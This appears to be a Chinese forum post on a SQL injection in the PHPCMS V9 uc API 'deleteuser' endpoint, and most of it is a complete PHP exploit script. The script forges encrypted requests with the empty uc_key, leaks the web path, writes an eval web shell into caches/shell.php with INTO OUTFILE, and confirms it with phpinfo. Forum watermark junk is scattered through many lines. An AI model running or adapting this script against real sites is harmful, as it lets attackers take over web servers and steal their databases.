PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
' Q% Y1 v  |, F; @9 r) J6 q  g
所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

3 }* [# V* P- ~' C' e1 Z5 C漏洞分析：
9 |% B+ y  u$ |. W# o1.未启用ucenter服务的情况下uc_key为空
  D. a3 n  J2 u" K3 \1 \define('UC_KEY', pc_base::load_config('system', 'uc_key'));
& _" T; U. {& |0 E3 ~2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
& B1 n! g# G  k    public function deleteuser($get,$post) {
        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
9 C( w3 b7 d8 n/ B" @6 f) \        $ids = new_stripslashes($get['ids']);
  K  e" l3 W5 w' @        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
$ J/ Q9 H" }" V. z' ]% k% O. h# y. Y2 {SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
% h7 `4 Y7 e3 B* H3 K0 n6 K
# G% f+ C0 ?7 A- C利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
) m9 U6 O: p( L8 _6 S4 _<?php
6 I1 C6 n; q1 B: Rprint_r('
- B3 S) i4 w3 c* M( q---------------------------------------------------------------------------
" o/ Y6 R% @( U; k+ e7 v' pPHPcms (v9 or Old Version) uc api sql injection 0day
$ ^2 h0 H7 ?5 {; E2 Q" k- jby rayh4c#80sec.com
! h( [* N, p: o/ z, `. x2 e---------------------------------------------------------------------------
/ p/ h  P4 B$ Z: h8 ^" U8 E');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
# e& f) S5 O5 Zpath:      path to phpcms
2 y# Y. ?7 Z' H6 I8 N0 zOptions:
-p[port]:    specify a port other than 80
' x: J! w: m* M+ `2 I -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
2 M& l" P$ v+ U) B' y0 V---------------------------------------------------------------------------
; Q, A$ g$ M+ @; ~, H9 \% T+ D');
  Q1 l& y/ Z, _& w    die;
% U; `, H$ W: k8 ?; J7 M}

- i. ]( W/ G' s, Perror_reporting(7);
ini_set("max_execution_time",0);
1 p( P( {3 N& d' F+ Sini_set("default_socket_timeout",5);

) I( q( M8 T3 }+ ~: K( e  Mfunction quick_dump($string)
" e$ o8 }4 f% c% W' `, Q6 b" k{
. E: ^! d; n3 G  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
8 F; O$ [. @" d7 F1 y% g  {
( x2 ?  V8 T4 V/ @' y/ D   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
+ `# b2 E: i" ?) V* q/ X   {$exa.=" ".dechex(ord($string[$i]));}
   else
  u! E3 d" T9 [   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
9 a, ~: r  Z" ~* s, p7 y' `4 v return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+ p" G5 b3 Q- z7 c  H
function send($packet)
{
( N) H0 o8 h* Q6 O7 u' {  global $proxy, $host, $port, $html, $proxy_regex;
2 ?7 F2 X1 t" s  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
, s$ z# c# h) L; s    if (!$ock) {
2 Y: U) q3 N  X      echo 'No response from '.$host.':'.$port; die;
5 Z4 o$ D3 y6 g2 p. \    }
1 b. j* s# e+ Q, t, ?  }
  else {
2 y' V, f- S' T4 Y! E        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
; i' Y4 D( S  ^' `$ }; F      echo 'Not a valid proxy...';die;
    }
, ]6 X7 V1 ~, W! ?    $parts=explode(':',$proxy);
0 m4 k7 \" Q3 `# _: N6 }+ @    $parts[1]=(int)$parts[1];
( r  Q8 f! p+ S. w1 }0 }    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
. @& p  F( P7 |. ]0 m/ J1 |    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
/ A" |: N3 U4 C" T0 N$ h3 v" u      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
9 t1 E, r# \. q+ {2 o; k" S5 R- o    while (!feof($ock)) {
      $html.=fgets($ock);
1 @  P9 C- \% d4 y9 ~    }
# z0 R1 I6 u3 G  }
  ?" G  ]- L: I  else {
" r6 y4 k" Q! R/ }9 |    $html='';
2 l  h, e& G$ f    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
) }0 _: E% l& h) [$ ^/ K7 U      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
: l- }1 T4 G6 f. d" B% O4 u
$host=$argv[1];
7 C# H2 l1 u0 |  q! V+ J# ?$path=$argv[2];
$port=80;
$proxy="";
. u  [# \7 Q; ^+ p" Ufor ($i=3; $i<$argc; $i++){
- K7 q2 P$ T$ D9 A: Y% _6 ~$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
0 n& J/ J2 Q( F+ _; v. V5 \( G  $port=(int)str_replace("-p","",$argv[$i]);
1 |/ i- C: G& W2 i}
' y# E) d, A$ Aif ($temp=="-P")
; h; M! z( d) E2 [{
7 `; [3 D6 U8 v' m( f  s/ W% P% U/ U  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
1 Y1 I0 g# c" |9 J- v+ I/ E4 C& bif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

2 S9 T8 ~' T( y- a    $ckey_length = 4;

9 y# R, @1 z' ]7 T" m% ^    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
- z3 u) o: |8 T( b% J/ ?( p    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
& f, v. T" w6 ?0 F2 ~$ p, W& p
4 T9 T8 D% V- u# |  ?    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
9 R# M! w; H  g0 N
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);
% z7 b# L3 U  N$ ^- d% b. D
+ p$ J4 o6 p* s1 x    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

5 t( a: y8 D/ h2 _, `; o    for($j = $i = 0; $i < 256; $i++) {
% F) B$ R5 W8 a+ r' r& S$ H        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
% i1 E3 W5 M( X4 L. e+ c& ~        $box[$j] = $tmp;
    }
) u/ j$ ?. a+ G# T, ^
6 h  v, @* U2 _; o    for($a = $j = $i = 0; $i < $string_length; $i++) {
$ J3 t+ ?7 {8 A3 z. z" o        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
6 X8 D- c6 d$ u2 ^& T: `        $box[$a] = $box[$j];
/ e/ ?6 Y( V4 ~. P% \        $box[$j] = $tmp;
2 T+ E" a1 G2 X* W0 B2 C        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
5 j) ~" L3 Y( V/ A6 S+ |) A5 s
) B, g0 F/ D- L0 o2 w) n    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
; @9 X. g: g& Z& E" u            return substr($result, 26);
7 S, ]# B4 Z+ T, _, L% Y        } else {
            return '';
        }
; r( [& v$ r% x5 U' s4 a% R! p* a    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
8 K% H" p+ F! \  q* q    }
5 x2 x" \+ d' c& W: \3 C5 z" t
4 O; w( _$ O, Z6 e/ U}
+ m! Y/ `8 ?" w4 L
$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
! o7 j7 u* x8 J. g% }/ F$SQL = urlencode(authcode($SQL, "ENCODE", ""));
' |+ g3 R9 |0 `/ D- Y7 M6 y- i. Pecho "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
+ |; k, i0 \6 t4 y3 Z9 t8 Y$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
0 _: t( ~7 V6 N/ x: N; M8 C$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
, P3 g$ k. }- W' G5 tsend($packet);
5 u5 `; F& F6 W3 f0 Jif(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
' s1 C" J& |- W$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
/ C1 r' J/ C( g  y) u9 P  c! Q$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
. d9 |* D: L" X0 U% Q$packet.="Connection: Close\r\n\r\n";
. M& J7 l2 \  [5 x9 bsend($packet);
" b) ^& \5 L' k( P2 Lpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
, ^/ [! c0 q& L  I, E9 T//print_r($matches);
if(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
7 M2 K5 t: [! D! B% ^- S" V& b" ^! wecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
- J; l5 V$ G* p9 K$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
9 O4 h8 u; T3 M* u$SQL.="&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
  ^* G& R" C5 R% V9 b9 Zecho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
- p4 r; D! W7 j$ D0 ]$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
. n( F2 `0 v  g* v; K, d$packet.="User-Agent: Mozilla/5.0\r\n";
  p0 c. c4 u: f6 Q0 R! }$packet.="Host: ".$host."\r\n";
4 L& P+ |1 s% y$packet.="Connection: Close\r\n\r\n";
9 y5 i3 K1 h6 }  X$ \+ C; qsend($packet);
' E6 u% l1 K: r7 j+ u0 K+ hif(strpos($html,"Access denied") > 0){
! s0 v8 L+ I) Y2 decho "[-] MYSQL权限过低 禁止写入文件 ";
die;
}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
/ B, I/ e' n- b! }, X$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
1 o5 r2 ~2 ?, s3 `send($packet);
: D& S! M* @1 Y7 X) i: F& z% cif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
' l- h; s5 q: B$ ^5 j}
+ r! ^) ], q/ ~+ K6 _}else{
echo "[-]未取到web路径 ";
$ `; N, I2 |* t' L! ]- c}
}else{
8 X9 `, Q$ M& z+ wecho "[*]不存在SQL注入漏洞"."\n";
/ C. x/ `/ }6 V+ C. o% v0 F# X, u2 z}
$ |: O. V5 D8 d2 J: z8 ?
?>